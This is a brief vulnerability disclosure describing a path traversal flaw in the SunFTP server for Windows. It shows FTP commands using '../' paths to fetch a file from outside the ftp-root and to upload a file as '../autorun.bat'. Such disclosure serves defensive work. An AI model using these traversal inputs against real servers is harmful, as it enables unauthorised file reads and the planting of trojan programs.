source: SunFTP is a freeware ftp server written by Rasmus J.P. Allenheim and associates for the Windows platform. SunFTP contains a vulnerability that may allow ftp users to compromise the server. Users may be able to upload or retrieve files from outside the protected ftp-root directory. This could allow, for example, users to place trojan horse programs on the system and gain control. Using this vulnerability to retrieve a file from outside the ftp-root (sunftptest.txt): ftp> get ../sunftptest.txt 200 Port command successful. 150 Opening data connection for ../sunftptest.txt. 226 File sent ok Using this vulnerability to place a file on the target filesystem outside the ftp-root (../autorun.bat): ftp> put Lokale Datei c:\test.txt Remotedatei ../autorun.bat